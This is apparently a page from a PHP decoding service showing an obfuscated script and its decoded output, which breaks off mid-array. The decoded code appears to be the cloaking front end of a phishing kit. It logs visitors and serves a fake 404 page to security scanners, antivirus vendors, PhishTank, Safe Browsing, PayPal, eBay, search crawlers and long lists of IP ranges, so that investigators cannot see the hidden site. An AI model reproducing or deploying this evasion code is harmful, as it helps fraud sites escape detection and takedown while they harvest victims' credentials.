Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ${"\x47\x4c\x4f\x42AL\x53"}["\x70\x62\x73hxms\x62pn"]="\x75\x73e\x72a\x67\x65nt";${"..

Decoded Output download

<?php ${"GLOBALS"}["pbshxmsbpn"]="useragent";${"GLOBALS"}["gviurxwlvpm"]="mobileall";${"GLOBALS"}["guxbyagqzm"]="hostname";${"GLOBALS"}["chqntkd"]="ua";${"GLOBALS"}["fwucmuxpn"]="key";${"GLOBALS"}["jmimgwxtrt"]="nemu";${"GLOBALS"}["vstjkn"]="cid";${"GLOBALS"}["wngmyj"]="os";${"GLOBALS"}["emnvrcgr"]="ip2";${"GLOBALS"}["vgircypvt"]="banned_isp";${"GLOBALS"}["fxxcbkjwoq"]="details";${"GLOBALS"}["riuxseld"]="content";${"GLOBALS"}["lsfplw"]="getip";${"GLOBALS"}["gvmmopj"]="curl";${"GLOBALS"}["qiqzxvb"]="br";${"GLOBALS"}["dixfts"]="browser_array";${"GLOBALS"}["dgwtelaz"]="browser";${"GLOBALS"}["iiydyedj"]="value";${"GLOBALS"}["wlpdngygwrd"]="user_agent";${"GLOBALS"}["vnlyszxsksem"]="regex";${"GLOBALS"}["titqmlcva"]="os_platform";${"GLOBALS"}["xrcepkdetfk"]="BotType";${"GLOBALS"}["lfkvcyf"]="Bot";${"GLOBALS"}["tgaounod"]="dp";${"GLOBALS"}["lvulipkb"]="word2";${"GLOBALS"}["birblobfl"]="blocked_words";${"GLOBALS"}["izikllqxp"]="ips";${"GLOBALS"}["rfukdbbgxg"]="id";${"GLOBALS"}["ocbzogh"]="v_agent";${"GLOBALS"}["hnyshjeo"]="bannedIP";${"GLOBALS"}["ykcskptxptor"]="click";${"GLOBALS"}["rhyxsi"]="file";${"GLOBALS"}["rumyugklv"]="ip";${"GLOBALS"}["orpaygrlnpo"]="word";${"GLOBALS"}["krkcfau"]="error";${"GLOBALS"}["cwhymyrw"]="domain";${"GLOBALS"}["lxisjowdnr"]="setting";${"GLOBALS"}["gnochsdegw"]="lock_country";session_start();$flgmrzyqhsc="ua";$kwdwodjmu="random_id";${"GLOBALS"}["wbkwequrptgi"]="setting";error_reporting(0);date_default_timezone_set("Asia/Jakarta");$rgnxqret="domain";$wecrghtqv="setting";include"main.php";${$kwdwodjmu}=sha1(md5(rand(0,1000000)));$csuqxdee="setting";${$rgnxqret}=preg_replace("/www\./i","",$_SERVER["SERVER_NAME"]);${${"GLOBALS"}["lxisjowdnr"]}=get_setting(${${"GLOBALS"}["cwhymyrw"]});${${"GLOBALS"}["krkcfau"]}=${${"GLOBALS"}["wbkwequrptgi"]}["error_code"];${"GLOBALS"}["ewtgjfqwtrog"]="lock_country_on";${${"GLOBALS"}["gnochsdegw"]}=${$wecrghtqv}["lock_country"];${${"GLOBALS"}["ewtgjfqwtrog"]}=${$csuqxdee}["lock_country_on"];${$flgmrzyqhsc}=$_SERVER["HTTP_USER_AGENT"];echo"<!--$random_id-->";if(${${"GLOBALS"}["krkcfau"]}==2){echo"DOMAIN NOT REGISTER !";}else{$sjnuwfq="v_agent";$votjwqxs="setting";${"GLOBALS"}["vyugxkqvkoaw"]="blocked_words";$lrudnkxtptj="br";$oglqxhg="hostname";$fmkpoueduzh="setting";${$oglqxhg}=gethostbyaddr($_SERVER["REMOTE_ADDR"]);${${"GLOBALS"}["vyugxkqvkoaw"]}=array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit","msnbot","p3pwgdsn","netcraft","trendmicro","ebay","paypal","torservers","messagelabs","sucuri.net","crawler","duckduck","feedfetcher","BitDefender","mcafee","antivirus","cloudflare","p3pwgdsn","avg","avira","avast","ovh.net","security","twitter","bitdefender","virustotal","phising","clamav","baidu","safebrowsing","eset","mailshell","azure","miniature","tlh.ro","aruba","dyn.plus.net","pagepeeker","SPRO-NET-207-70-0","SPRO-NET-209-19-128","vultr","colocrossing.com","geosr","drweb","dr.web","linode.com","opendns","cymru.com","sl-reverse.com","surriel.com","hosting","orange-labs","speedtravel","metauri","apple.com","bruuk.sk","sysms.net","oracle","cisco","amuri.net","versanet.de","hilfe-veripayed.com","googlebot.com","upcloud.host","nodemeter.net","e-active.nl","downnotifier","online-domain-tools","fetcher6-2.go.mail.ru","uptimerobot.com","monitis.com","colocrossing.com","majestic12","as9105.com","btcentralplus.com","anonymizing-proxy","digitalcourage.de","triolan.net","staircaseirony","stelkom.net","comrise.ru","kyivstar.net","mpdedicated.com","starnet.md","progtech.ru","hinet.net","is74.ru","shore.net","cyberinfo","ipredator","unknown.telecom.gomel.by","minsktelecom.by","parked.factioninc.com");${"GLOBALS"}["yjwxdx"]="ip2";${"GLOBALS"}["jxybbeftqwh"]="setting";if(${${"GLOBALS"}["lxisjowdnr"]}["block_host"]=="on"){${"GLOBALS"}["xhcjqeriuw"]="blocked_words";foreach(${${"GLOBALS"}["xhcjqeriuw"]} as${${"GLOBALS"}["orpaygrlnpo"]}){${"GLOBALS"}["onpcjortwp"]="hostname";if(substr_count(${${"GLOBALS"}["onpcjortwp"]},${${"GLOBALS"}["orpaygrlnpo"]})>0){$xxsxhatmkm="ip";${${"GLOBALS"}["rumyugklv"]}=getenv("REMOTE_ADDR");$wzfbhirhwug="click";${"GLOBALS"}["khdbqkd"]="file";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["khdbqkd"]}," BLOCKED BY HOSTNAME || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${$xxsxhatmkm}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${$wzfbhirhwug}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip (Detect by HOSTNAME)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}}}$kccctorp="lock_country_on";$zfrdrtdh="ips";${${"GLOBALS"}["hnyshjeo"]}=array("66.249.91.*","66.249.91.203","^81.161.59.*","^66.135.200.*","^66.102.*.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","68.65.53.71","^198.25.*.*","^64.106.213.*","^91.103.66.*","^208.91.115.*","^199.30.228.*","^84.93.84.*","^182.75.120.*","^182.75.120.10","^46.101.43.*","^147.75.210.*");${"GLOBALS"}["jpjpvwpw"]="setting";if(${$fmkpoueduzh}["block_iprange"]=="on"){$gdzibbp="bannedIP";if(in_array($_SERVER["REMOTE_ADDR"],${$gdzibbp})){${"GLOBALS"}["uomkewlp"]="ip";${${"GLOBALS"}["rumyugklv"]}=getenv("REMOTE_ADDR");${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED BY IP || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["uomkewlp"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${"GLOBALS"}["nxqoivmh"]="click";${"GLOBALS"}["cpefigii"]="click";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["cpefigii"]},"$ip (Detect by IP Range)"."
");fclose(${${"GLOBALS"}["nxqoivmh"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}else{foreach(${${"GLOBALS"}["hnyshjeo"]} as${${"GLOBALS"}["rumyugklv"]}){if(preg_match("/".${${"GLOBALS"}["rumyugklv"]}."/",$_SERVER["REMOTE_ADDR"])){$ofulqhjjlf="ip";${"GLOBALS"}["riewpptirv"]="file";${$ofulqhjjlf}=getenv("REMOTE_ADDR");${"GLOBALS"}["qgfscmptnl"]="click";${"GLOBALS"}["ucpbowgjm"]="ip";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["riewpptirv"]}," BLOCKED BY IP || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["ucpbowgjm"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["qgfscmptnl"]},"$ip (Detect by IP Range)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}}}}$qeegojfjfnu="os";${"GLOBALS"}["owfqcfvicur"]="br";$tmpebarbeg="dp";${"GLOBALS"}["dyguiesxygdd"]="blocked_words";${${"GLOBALS"}["ocbzogh"]}=$_SERVER["HTTP_USER_AGENT"];if(${${"GLOBALS"}["ocbzogh"]}=="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"||${${"GLOBALS"}["ocbzogh"]}=="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)"){${"GLOBALS"}["eosddmr"]="ip";$sqiteeqhw="click";$rgphgl="ip";${"GLOBALS"}["owxkvrvtplr"]="file";$ezsdwlylscom="file";$rugabqkwpw="click";${$rgphgl}=getenv("REMOTE_ADDR");${$ezsdwlylscom}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["owxkvrvtplr"]}," BLOCKED BY APPLEBOT || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["eosddmr"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${$rugabqkwpw}=fopen("logs/total_bot.txt","a");fwrite(${$sqiteeqhw},"$ip (Detect by APPLEBOT)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}if(${$sjnuwfq}=="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"){${${"GLOBALS"}["rumyugklv"]}=getenv("REMOTE_ADDR");$ljyiufssy="file";$bciwsv="click";${"GLOBALS"}["drdumqzfx"]="click";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");fwrite(${$ljyiufssy}," BLOCKED BY APPLEBOT || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["rumyugklv"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${$bciwsv}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["drdumqzfx"]},"$ip (Detect by APPLEBOT)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}$ekmduw="ispnya";if(strpos($_SERVER["HTTP_USER_AGENT"],"favicon")or strpos($_SERVER["HTTP_USER_AGENT"],"Java")or strpos($_SERVER["HTTP_USER_AGENT"],"FreeBSD")or strpos($_SERVER["HTTP_USER_AGENT"],"msnbot")or strpos($_SERVER["HTTP_USER_AGENT"],"Yahoo! Slurp")or strpos($_SERVER["HTTP_USER_AGENT"],"YahooSeeker")or strpos($_SERVER["HTTP_USER_AGENT"],"Googlebot")or strpos($_SERVER["HTTP_USER_AGENT"],"bingbot")or strpos($_SERVER["HTTP_USER_AGENT"],"crawler")or strpos($_SERVER["HTTP_USER_AGENT"],"PycURL")or strpos($_SERVER["HTTP_USER_AGENT"],"facebookexternalhit")!==false){header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}$puflbehsjnvp="os";${${"GLOBALS"}["rfukdbbgxg"]}=$_SERVER["REMOTE_ADDR"];${$zfrdrtdh}=array("^94.26.*.*","^95.85.*.*","^72.52.96.*","^212.8.79.*","^62.99.77.*","^83.31.118.*","^91.231.*.*","^206.207.*.*","^91.231.212.*","^62.99.77.*","^198.41.243.*","^162.158.*.*","^162.158.7.*","^162.158.72.*","^173.245.55.*","^108.162.246.*","^162.158.95.*","^108.162.215.*","^95.108.194.*","^141.101.104.*","^93.54.82.*","^69.164.145.*","^194.153.113.*","^178.43.117.*","^62.141.65.*","^83.31.69.*","^107.178.195.*","^149.20.54.*","^85.9.7.*","^87.106.251.*","^107.178.194.*","^124.66.185.*","^133.11.204.*","^185.2.138.*","^188.165.83.*","^78.148.13.*","^192.232.213.*","^1.234.41.*","^124.66.185.*","^87.106.251.*","^176.195.231.*","^206.253.226.*","^107.20.181.*","^188.244.39.*","^124.66.185.*","^38.74.138.*","^124.66.185.*","^38.74.138.*","^206.253.226.*","^1.234.41.*","^124.66.185.*","^87.106.251.*","^85.9.7.*","^37.140.188.*","^195.128.227.*","^38.74.138.*","^107.20.181.*","^46.4.120.*","^107.178.194.*","^198.60.236.*","^217.74.103.*","^92.103.69.*","^217.74.103.*","^66.211.160.86*","^46.244.*.*","^131.120.12.*","^157.201.10.*","^172.217.*.*","^103.86.99.*","^213.100.*.*","^216.58.*.*","^173.194.*.*","^74.125.133.*","^66.102.*.*","^66.249.*.*","^209.85.*.*","^216.239.*.*","^64.4.*.*","^65.52.*.*","^131.253.*.*","^157.54.*.*","^207.46.*.*","^207.68.*.*","^8.12.*.*","^66.196.*.*","^66.228.*.*","^67.195.*.*","^68.142.*.*","^72.30.*.*","^74.6.*.*","^98.136.*.*","^202.160.*.*","^209.191.*.*","^66.102.*.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","68.65.53.71","^198.25.*.*","^64.106.213.*","^184.165.*.*","^198.68.61.*","^199.3.10.*","^204.119.24.*","^204.251.90.*","^100.43.*.*","^72.94.249.*","^103.6.76.*","^106.12.*.*","^115.231.36.*","^5.189.*.*","^66.102.6.*","^66.249.*.*","^173.252.*.*","^196.23.168.*","^190.82.81.*","^92.189.25.*","^52.31.147.*","^69.164.111.*","^173.252.86.*","^173.239.*.*","^203.215.181.*","^208.43.225.*","^173.192.*.*","^212.113.37.*","^119.63.*.*","^188.207.200.*","^89.108.102.*","^173.11.97.*","^209.185.108.*","^209.185.253.*","^216.239.*.*","^64.68.*.*","^66.249.*.*","^72.14.199.*","^8.6.48.*","^141.185.209.*","^169.207.238.*","^202.160.*.*","^195.211.*.*","^185.41.162.*","^51.15.*.*","^84.51.153.*","^185.220.101.*","^40.85.158.*","^72.94.249.*","^8.23.224.*","^104.132.20.*","^1.33.126.*","^217.96.*.*","^64.233.160.*","^93.119.*.*","^23.27.152.*","^111.231.*.*","^144.217.82.*","^148.163.128.*","^41.208.72.*","^36.74.236.*","^64.233.173.*","^36.83.56.*","^87.115.213.*","^110.88.*.*","^46.101.119.*","^87.115.213.*","^68.14.83.*","^100.6.107.*","^174.255.*.*","^72.49.133.*","^104.15.60.*","^35.153.86.*","^191.98.136.*","^175.135.172.*","^134.119.*.*","^208.101.*.*","^104.42.*.*","^181.229.*.*","^89.234.*.*","^186.6.*.*","^103.19.16.*","^158.69.216.*","^157.39.109.*","^83.31.*.*","^92.23.56.*","^86.132.235.*","^106.133.165.*","^111.89.*.*","^14.101.178.*","^107.178.*.*","^180.29.89.*","^61.21.221.*","^204.85.191.*","^188.166.*.*","^103.19.16.*","^199.59.150.*","^209.135.212.*","^208.87.233.*","^83.31.*.*","^49.104.10.*","^216.252.*.*","^24.172.*.*","^193.128.*.*","^162.244.*.*","^40.121.198.*","^95.45.252.*","^188.166.*.*","^83.71.*.*","^66.214.*.*","^205.201.132.*","^40.107.*.*","^104.132.*.*","^173.205.33.*","^185.145.156.*","^17.198.249.*","^103.35.*.*","^128.28.*.*","^128.72.*.*","^128.75.*.*","^138.122.*.*","^139.59.*.*","^50.107.*.*","^66.102.*.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^66.211.169.3","^66.211.169.66","^89.163.159.214","^37.128.131.171","^12.148.196.*","^193.220.178.*","^68.65.53.71","^198.25.*.*","^64.106.213.*","^104.108.64.175","104.83.233.198","^173.194.116.102","^173.194.112.*","^65.55.206.154","^193.221.113.53","^208.76.45.53","^208.84.*.*","^207.46.8.167","^65.54.188.110","^207.46.8.199","^134.170.2.199","^65.55.92.152","^65.54.188.94","^65.55.37.104","^65.55.92.168","^65.55.37.120","^65.55.33.119","^65.55.92.184","^65.54.188.126","^65.55.37.88","^65.55.37.88","^65.55.92.136","^207.46.8.199","^65.55.92.168","^65.54.188.94","^65.55.33.119","^65.55.37.104","^65.54.188.110","^65.55.37.72","^65.55.92.152","^207.46.8.167","^65.55.33.135","^134.170.2.199","^65.55.85.12","^173.194.116.149","^216.58.211.37","^89.163.159.214","^64.233.*.*","^66.102.*.*","^66.249.*.*","^216.239.*.*","^216.33.229.163","^64.233.173.*","^64.68.90.*","^66.102.*.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","68.65.53.71","^198.25.*.*","^64.106.213.*","^54.228.218.117","^54.228.218.*","^185.28.20.243","^185.28.20.*","^217.16.26.166","^217.16.26.*
     ^206.207.*.*","^209.19.*.*","^207.70.*.*","^185.75.*.*","^193.226.*.*","^66.102.*.*","^64.71.*.*","^69.164.*.*","^64.74.*.*","^64.235.*.*","^4.14.64.*.*","^4.14.64.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^72.13.86.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","^68.65.53.71","^198.25.*.*","^4.14.0.0","^206.207.*.*","^209.19.*.*","^207.70.*.*","^185.75.*.*","^193.226.*.*","^66.102.*.*","^64.71.*.*","^69.164.*.*","^64.74.*.*","^64.235.*.*","^4.14.64.*.*","^4.14.64.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^72.13.86.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","^68.65.53.71","^198.25.*.*","^4.14.0.0","^104.236.153.*","^107.170.*.*","^64.71.206.*","^64.71.205.*","^64.71.204.*","^66.102.8.*","^157.55.39.*","^105.107.79.*","^4.14.64.*","^64.74.215.*","^198.186.190.*","^198.186.191.*","^198.186.192.*","^198.186.193.*","^109.186.*.*","^12.148.196.*","^12.148.209.*","^128.242.*.*","^131.212.*.*","^149.20.*.*","^158.108.*.*","^163.195.178.*","^167.24.*.*","^168.188.*.*","^173.194.*.*","^173.224.160.*","^173.224.161.*","^173.224.162.*","^173.224.163.*","^173.224.164.*","^173.224.165.*","^173.224.166.*","^173.224.167.*","^184.173.*.*","^192.115.134.*","^192.118.48.*","^193.220.178.*","^193.253.199.*","^193.47.80.*","^194.52.68.*","^194.72.238.*","^194.90.*.*","^198.25.*.*","^198.54.*.*","^199.30.228.*","^202.108.252.*","^204.14.48.*","^206.28.72.*","^207.126.144.*","^208.65.144.*","^208.91.115.*","^209.73.228.*","^209.85.*.*","^209.85.128.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^212.29.192.*","^212.29.224.*","^212.50.193.*","^216.10.193.*","^216.239.32.*","^216.252.167.*","^217.132.*.*","^217.132.*.*","^38.100.*.*","^38.100.*.*","^38.105.*.*","^38.144.36.*","^46.116.*.* ","^50.7.*.*","^50.97.*.*","^54.176.*.*","^62.116.207.*","^62.90.*.*","^64.106.213.*","^64.124.14.*","^64.18.*.*","^64.233.160.*","^64.27.2.*","^64.37.103.*","^64.62.136.*","^64.62.175.*","^66.102.*.*","^66.102.*.*","^66.135.200.*","^66.150.14.*","^66.205.64.*","^66.207.120.*","^66.221.*.*","^66.249.*.*","^67.15.*.*","^67.209.128.*","^68.65.53.71","^69.61.12.*","^69.65.*.*","^72.14.192.*","^72.14.192.*","^74.125.*.*","^74.125.*.*","^74.125.*.*","^81.161.59.*","^82.166.*.*","^85.250.*.*","^85.64.*.*","^89.138.*.*","^89.138.*.*","^91.103.66.*","^93.172.*.*","^81.161.59.*","^66.135.200.*","^66.102.*.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* 